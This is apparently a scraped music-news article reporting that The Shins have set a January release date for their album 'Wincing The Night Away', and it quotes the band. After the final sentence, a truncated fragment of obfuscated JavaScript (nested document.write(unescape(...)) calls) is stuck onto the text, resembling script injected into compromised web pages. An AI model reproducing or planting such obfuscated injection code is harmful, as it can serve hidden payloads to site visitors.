The Shins have confirmed the release date of their long-awaited new album 'Wincing The Night Away'.
The cult American indie band, who pulled out of their slot at this year's Carling Weekend; Reading and Leeds festivals to finish the record, will release it on January 22 next year (23rd in the States).
The Shins been working on the follow-up to 2003's 'Chutes Too Narrow' with producer Phil Ek since September in Seattle, finishing the LP in frontman James Mercer's home studio.
Speaking about the release date on their official website, the band wrote: "Trust us if we had our way it would be out next week, but 'The Man' has seen fit to do otherwise.
"The good folks at Sub Pop have scheduled this like a finely tuned machine, and we have all the confidence in the world that January is the magic month for a reason. We are excited."
New songs which have already been premiered live include 'Circus Walk', 'Phantom' and 'Australia'.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
